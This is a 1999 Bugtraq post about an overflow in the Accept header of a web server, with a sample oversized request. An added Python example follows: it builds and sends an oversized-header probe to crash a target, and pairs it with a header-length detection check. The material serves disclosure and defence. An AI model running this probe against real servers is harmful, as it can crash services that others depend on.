Bugtraq mailing list archives

Enterprise Overflow


From: neophyte () BEAVUH ORG (Daniel Kerr)
Date: Sat, 11 Sep 1999 22:17:55 -0400


Posted on dark spyrit's behalf...

Our apologies for holding back on this info; we just had a few things to
sort out first.

As is the norm for an ISS advisory, retrieving any useful information is
completely out of the question - after all, the market value of a product
is at stake.
Heaven forbid that the xforce would give the security community real
information, without asking anything in return. I dread the day.

So rather than being duped into downloading the scanner, and still gaining no
insight into the vulnerability itself, we at beavuh will share what we know.

An overflow exists in the "Accept" header field, which can be exploited
with any of the common request methods.
e.g:

GET / HTTP/1.0
Accept: (a page or so of data)

The fact that this overflow also affects other request methods rather than
just "GET" leads me to believe that this may not be the same hole the
xforce mentioned.

Hopefully we will receive a reply offering more detailed information, or
at least an acknowledgement of whether this is the same hole.

Be sure to check out the new issue of Phrack, which includes my article on
Win32 overflows.
Everything from locating the weakness using disassembly techniques, to
exploiting it, through to adding your own code to the binary executable(s)
to prevent the vulnerabilities.
The shellcode spawns a full-blown command prompt on any port you specify,
without relying on downloading external files - which seems to be the
trend with win32 remote exploits.

We may release demonstration code for Enterprise if the need arises.

dark spyrit / Barnaby Jack <dspyrit () beavuh org>

beavuh - bend over and pray.
http://www.beavuh.org
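The trigger described in the post (an oversized "Accept" header on any common request method) can be reproduced and, on the defensive side, detected without any knowledge of the server internals. What follows is an added example written for this archive page; it is not beavuh's demonstration code and not anything from the ISS advisory. Everything beyond the shape of the request shown above is an assumption: the post only says "a page or so of data", so the filler length is a parameter defaulting to 4096 bytes, the flagging threshold of 1024 bytes is a made-up proxy/IDS limit, and the host names are placeholders. The sample benign request in the usage note is constructed.

```python
"""Probe builder and Accept-header length check for the Enterprise Server
overflow described in the post above.

Added example, not beavuh's code.  Assumptions (not from the post): the
exact header length needed is unknown ("a page or so"), so the size is a
parameter defaulting to 4096 bytes; the filler is a run of 'A'; the
host/port given to send_probe() are placeholders.
"""
import socket

DEFAULT_FILL = 4096                # assumption: "a page or so" of data
ACCEPT_LIMIT = 1024                # assumption: flag anything longer than this
METHODS = ("GET", "HEAD", "POST")  # the post says any common method works


def build_probe(method="GET", path="/", fill_len=DEFAULT_FILL,
                host="target.example"):
    """Return raw HTTP/1.0 request bytes carrying an oversized Accept header.

    The request has the shape shown in the post (request line, then an
    Accept header whose value is fill_len bytes of 'A').  POST gets a
    small body so the request is well formed for that method too.
    """
    if method not in METHODS:
        raise ValueError("unsupported method: %s" % method)
    lines = [
        "%s %s HTTP/1.0" % (method, path),
        "Host: %s" % host,
        "Accept: %s" % ("A" * fill_len),
    ]
    body = b""
    if method == "POST":
        body = b"x=1"
        lines.append("Content-Type: application/x-www-form-urlencoded")
        lines.append("Content-Length: %d" % len(body))
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii") + body


def parse_headers(raw):
    """Split a raw request into (request_line, {name_lower: value}).

    Accepts CRLF or bare LF line endings and ignores everything after the
    first blank line (the body).
    """
    sep = b"\r\n\r\n" if b"\r\n\r\n" in raw else b"\n\n"
    head = raw.split(sep, 1)[0]
    lines = head.decode("latin-1").splitlines()
    request_line = lines[0] if lines else ""
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return request_line, headers


def oversized_accept(raw, limit=ACCEPT_LIMIT):
    """True if the request carries an Accept header longer than limit.

    This is the check a filtering proxy or IDS rule would make.  It is
    deliberately independent of the request method, since the post says
    every common method reaches the same overflow.
    """
    _, headers = parse_headers(raw)
    return len(headers.get("accept", "")) > limit


def send_probe(host, port=80, method="GET", fill_len=DEFAULT_FILL,
               timeout=5.0):
    """Send one probe and report whether the server still answers.

    Returns the first response line, or None if the connection was reset
    or timed out, which against a vulnerable server is the crash.  Only
    run this against a host you are authorised to test.
    """
    req = build_probe(method, fill_len=fill_len, host=host)
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(req)
            data = s.recv(512)
    except OSError:          # covers timeout and connection reset
        return None
    if not data:
        return None
    return data.split(b"\r\n", 1)[0].decode("latin-1", "replace")
```

build_probe() produces the request to send; oversized_accept() is the matching defensive check, run here over the constructed probe and a constructed benign request such as `GET /index.html HTTP/1.0` with `Accept: text/html`. A server that survives the probe with a normal status line is not necessarily patched; it only means that particular length and method did not reach the overflow.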
